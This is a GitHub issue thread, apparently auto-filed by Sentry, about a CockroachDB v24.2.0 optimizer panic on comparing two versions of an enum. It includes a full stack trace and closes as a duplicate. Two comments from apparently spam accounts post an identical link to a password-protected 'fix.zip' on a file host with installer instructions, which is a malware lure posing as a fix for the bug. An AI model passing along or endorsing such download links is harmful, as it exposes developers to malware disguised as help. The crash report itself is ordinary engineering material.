### ISSUE TITLE
Sentry: datum.go:5346: comparison of two different versions of enum %!s(func() string=0x14c5680) oid ×: versions 64 and 63
(1) assertion failure
Wraps: (2) attached stack trace
  -- stack trace:
  | ...

### ISSUE THREAD

**Issue by cockroach-sentry** [cockroachdb/cockroach#129624] opened 2024-08-26 08:35 UTC
This issue was auto filed by Sentry. It represents a crash or reported error on a live cluster with telemetry enabled.

Sentry Link: [https://cockroach-labs.sentry.io/issues/5757751723/?referrer=webhooks_plugin](https://cockroach-labs.sentry.io/issues/5757751723/?referrer=webhooks_plugin)

Panic Message:

```
datum.go:5346: comparison of two different versions of enum %!s(func() string=0x14c5680) oid ×: versions 64 and 63
(1) assertion failure
Wraps: (2) attached stack trace
  -- stack trace:
  | github.com/cockroachdb/cockroach/pkg/sql/sem/tree.(*DEnum).Compare
  | 	github.com/cockroachdb/cockroach/pkg/sql/sem/tree/datum.go:5346
  | github.com/cockroachdb/cockroach/pkg/sql/opt/constraint.(*KeyContext).Compare
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/constraint/key.go:325
  | github.com/cockroachdb/cockroach/pkg/sql/opt/constraint.Key.Compare
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/constraint/key.go:116
  | github.com/cockroachdb/cockroach/pkg/sql/opt/constraint.(*Span).StartsAfter
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/constraint/span.go:222
  | github.com/cockroachdb/cockroach/pkg/sql/opt/props.(*Histogram).filter
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/props/histogram.go:270
  | github.com/cockroachdb/cockroach/pkg/sql/opt/props.(*Histogram).Filter
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/props/histogram.go:411
  | github.com/cockroachdb/cockroach/pkg/sql/opt/memo.(*statisticsBuilder).updateHistogram
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/memo/statistics_builder.go:3903
  | github.com/cockroachdb/cockroach/pkg/sql/opt/memo.(*statisticsBuilder).applyConstraintSet
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/memo/statistics_builder.go:3718
  | github.com/cockroachdb/cockroach/pkg/sql/opt/memo.(*statisticsBuilder).applyFiltersItem
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/memo/statistics_builder.go:3453
  | github.com/cockroachdb/cockroach/pkg/sql/opt/memo.(*statisticsBuilder).applyFilters
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/memo/statistics_builder.go:3341
  | github.com/cockroachdb/cockroach/pkg/sql/opt/memo.(*statisticsBuilder).filterRelExpr
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/memo/statistics_builder.go:3290
  | github.com/cockroachdb/cockroach/pkg/sql/opt/memo.(*statisticsBuilder).buildSelect
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/memo/statistics_builder.go:1092
  | github.com/cockroachdb/cockroach/pkg/sql/opt/memo.(*logicalPropsBuilder).buildSelectProps
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/memo/logical_props_builder.go:307
  | github.com/cockroachdb/cockroach/pkg/sql/opt/memo.(*Memo).MemoizeSelect
  | 	github.com/cockroachdb/cockroach/bazel-out/k8-opt/bin/pkg/sql/opt/memo/expr.og.go:21188
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).ConstructSelect
  | 	github.com/cockroachdb/cockroach/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go:1575
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).ConstructSelect
  | 	github.com/cockroachdb/cockroach/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go:740
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).CopyAndReplaceDefault
  | 	github.com/cockroachdb/cockroach/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go:24995
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).AssignPlaceholders.func2
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/norm/factory.go:396
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).invokeReplace
  | 	github.com/cockroachdb/cockroach/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go:26397
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).CopyAndReplaceDefault
  | 	github.com/cockroachdb/cockroach/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go:25129
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).AssignPlaceholders.func2
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/norm/factory.go:396
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).invokeReplace
  | 	github.com/cockroachdb/cockroach/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go:26397
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).CopyAndReplaceDefault
  | 	github.com/cockroachdb/cockroach/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go:25002
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).AssignPlaceholders.func2
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/norm/factory.go:396
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).invokeReplace
  | 	github.com/cockroachdb/cockroach/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go:26397
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).CopyAndReplace
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/norm/factory.go:311
  | github.com/cockroachdb/cockroach/pkg/sql/opt/norm.(*Factory).AssignPlaceholders
  | 	github.com/cockroachdb/cockroach/pkg/sql/opt/norm/factory.go:398
  | github.com/cockroachdb/cockroach/pkg/sql.(*optPlanningCtx).reuseMemo
  | 	github.com/cockroachdb/cockroach/pkg/sql/plan_opt.go:554
  | github.com/cockroachdb/cockroach/pkg/sql.(*optPlanningCtx).fetchPreparedMemoLegacy
  | 	github.com/cockroachdb/cockroach/pkg/sql/plan_opt.go:785
  | github.com/cockroachdb/cockroach/pkg/sql.(*optPlanningCtx).buildExecMemo
  | 	github.com/cockroachdb/cockroach/pkg/sql/plan_opt.go:809
  | github.com/cockroachdb/cockroach/pkg/sql.(*planner).makeOptimizerPlan
  | 	github.com/cockroachdb/cockroach/pkg/sql/plan_opt.go:251
  | github.com/cockroachdb/cockroach/pkg/sql.(*connExecutor).makeExecPlan
  | 	github.com/cockroachdb/cockroach/pkg/sql/conn_executor_exec.go:2291
Wraps: (3) comparison of two different versions of enum %!s(func() string=0x14c5680) oid ×: versions 64 and 63
Error types: (1) *assert.withAssertionFailure (2) *withstack.withStack (3) *errutil.leafError
-- report composition:
*errutil.leafError: comparison of two different versions of enum %!s(func() string=0x14c5680) oid ×: versions 64 and 63
datum.go:5346: *withstack.withStack (top exception)
*assert.withAssertionFailure
```

<details>
<summary>Stacktrace (expand for inline code snippets):</summary>

[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/conn_executor_exec.go#L2290-L2292](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/conn_executor_exec.go#L2290-L2292)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/plan_opt.go#L250-L252](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/plan_opt.go#L250-L252)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/plan_opt.go#L808-L810](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/plan_opt.go#L808-L810)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/plan_opt.go#L784-L786](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/plan_opt.go#L784-L786)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/plan_opt.go#L553-L555](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/plan_opt.go#L553-L555)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/norm/factory.go#L397-L399](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/norm/factory.go#L397-L399)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/norm/factory.go#L310-L312](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/norm/factory.go#L310-L312)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L26396-L26398](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L26396-L26398)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/norm/factory.go#L395-L397](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/norm/factory.go#L395-L397)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L25001-L25003](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L25001-L25003)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L26396-L26398](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L26396-L26398)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/norm/factory.go#L395-L397](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/norm/factory.go#L395-L397)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L25128-L25130](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L25128-L25130)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L26396-L26398](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L26396-L26398)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/norm/factory.go#L395-L397](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/norm/factory.go#L395-L397)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L24994-L24996](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L24994-L24996)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L739-L741](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L739-L741)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L1574-L1576](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go#L1574-L1576)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/memo/expr.og.go#L21187-L21189](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/bazel-out/k8-opt/bin/pkg/sql/opt/memo/expr.og.go#L21187-L21189)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/logical_props_builder.go#L306-L308](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/logical_props_builder.go#L306-L308)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/statistics_builder.go#L1091-L1093](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/statistics_builder.go#L1091-L1093)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/statistics_builder.go#L3289-L3291](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/statistics_builder.go#L3289-L3291)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/statistics_builder.go#L3340-L3342](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/statistics_builder.go#L3340-L3342)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/statistics_builder.go#L3452-L3454](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/statistics_builder.go#L3452-L3454)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/statistics_builder.go#L3717-L3719](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/statistics_builder.go#L3717-L3719)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/statistics_builder.go#L3902-L3904](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/memo/statistics_builder.go#L3902-L3904)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/props/histogram.go#L410-L412](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/props/histogram.go#L410-L412)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/props/histogram.go#L269-L271](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/props/histogram.go#L269-L271)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/constraint/span.go#L221-L223](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/constraint/span.go#L221-L223)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/constraint/key.go#L115-L117](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/constraint/key.go#L115-L117)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/constraint/key.go#L324-L326](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/opt/constraint/key.go#L324-L326)
[https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/sem/tree/datum.go#L5345-L5347](https://github.com/cockroachdb/cockroach/blob/953d09cce5a01cc0053e138516d80a27454f027c/pkg/sql/sem/tree/datum.go#L5345-L5347)
</details>

```
pkg/sql/conn_executor_exec.go in pkg/sql.(*connExecutor).makeExecPlan at line 2291
pkg/sql/plan_opt.go in pkg/sql.(*planner).makeOptimizerPlan at line 251
pkg/sql/plan_opt.go in pkg/sql.(*optPlanningCtx).buildExecMemo at line 809
pkg/sql/plan_opt.go in pkg/sql.(*optPlanningCtx).fetchPreparedMemoLegacy at line 785
pkg/sql/plan_opt.go in pkg/sql.(*optPlanningCtx).reuseMemo at line 554
pkg/sql/opt/norm/factory.go in pkg/sql/opt/norm.(*Factory).AssignPlaceholders at line 398
pkg/sql/opt/norm/factory.go in pkg/sql/opt/norm.(*Factory).CopyAndReplace at line 311
bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go in pkg/sql/opt/norm.(*Factory).invokeReplace at line 26397
pkg/sql/opt/norm/factory.go in pkg/sql/opt/norm.(*Factory).AssignPlaceholders.func2 at line 396
bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go in pkg/sql/opt/norm.(*Factory).CopyAndReplaceDefault at line 25002
bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go in pkg/sql/opt/norm.(*Factory).invokeReplace at line 26397
pkg/sql/opt/norm/factory.go in pkg/sql/opt/norm.(*Factory).AssignPlaceholders.func2 at line 396
bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go in pkg/sql/opt/norm.(*Factory).CopyAndReplaceDefault at line 25129
bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go in pkg/sql/opt/norm.(*Factory).invokeReplace at line 26397
pkg/sql/opt/norm/factory.go in pkg/sql/opt/norm.(*Factory).AssignPlaceholders.func2 at line 396
bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go in pkg/sql/opt/norm.(*Factory).CopyAndReplaceDefault at line 24995
bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go in pkg/sql/opt/norm.(*Factory).ConstructSelect at line 740
bazel-out/k8-opt/bin/pkg/sql/opt/norm/factory.og.go in pkg/sql/opt/norm.(*Factory).ConstructSelect at line 1575
bazel-out/k8-opt/bin/pkg/sql/opt/memo/expr.og.go in pkg/sql/opt/memo.(*Memo).MemoizeSelect at line 21188
pkg/sql/opt/memo/logical_props_builder.go in pkg/sql/opt/memo.(*logicalPropsBuilder).buildSelectProps at line 307
pkg/sql/opt/memo/statistics_builder.go in pkg/sql/opt/memo.(*statisticsBuilder).buildSelect at line 1092
pkg/sql/opt/memo/statistics_builder.go in pkg/sql/opt/memo.(*statisticsBuilder).filterRelExpr at line 3290
pkg/sql/opt/memo/statistics_builder.go in pkg/sql/opt/memo.(*statisticsBuilder).applyFilters at line 3341
pkg/sql/opt/memo/statistics_builder.go in pkg/sql/opt/memo.(*statisticsBuilder).applyFiltersItem at line 3453
pkg/sql/opt/memo/statistics_builder.go in pkg/sql/opt/memo.(*statisticsBuilder).applyConstraintSet at line 3718
pkg/sql/opt/memo/statistics_builder.go in pkg/sql/opt/memo.(*statisticsBuilder).updateHistogram at line 3903
pkg/sql/opt/props/histogram.go in pkg/sql/opt/props.(*Histogram).Filter at line 411
pkg/sql/opt/props/histogram.go in pkg/sql/opt/props.(*Histogram).filter at line 270
pkg/sql/opt/constraint/span.go in pkg/sql/opt/constraint.(*Span).StartsAfter at line 222
pkg/sql/opt/constraint/key.go in pkg/sql/opt/constraint.Key.Compare at line 116
pkg/sql/opt/constraint/key.go in pkg/sql/opt/constraint.(*KeyContext).Compare at line 325
pkg/sql/sem/tree/datum.go in pkg/sql/sem/tree.(*DEnum).Compare at line 5346
```

### Tags

| Tag | Value |
| --- | --- |
| Command | server |
| Environment | v24.2.0 |
| Go Version | go1.22.5 X:nocoverageredesign |
| Platform | linux amd64 |
| Distribution | CCL |
| Cockroach Release | v24.2.0 |
| Cockroach SHA | 953d09cce5a01cc0053e138516d80a27454f027c |
| # of CPUs | 16 |
| # of Goroutines | 1222 |

Jira issue: CRDB-41627

**Comment by HaxBaba123** [comment] 2024-08-26 08:36
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment] 2024-08-26 08:36
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DrewKimball** [comment] 2024-08-26 20:07
Dupe of #129623

**Closed by DrewKimball** 2024-08-26 20:07 UTC
Labels: C-bug, O-sentry, branch-release-24.2
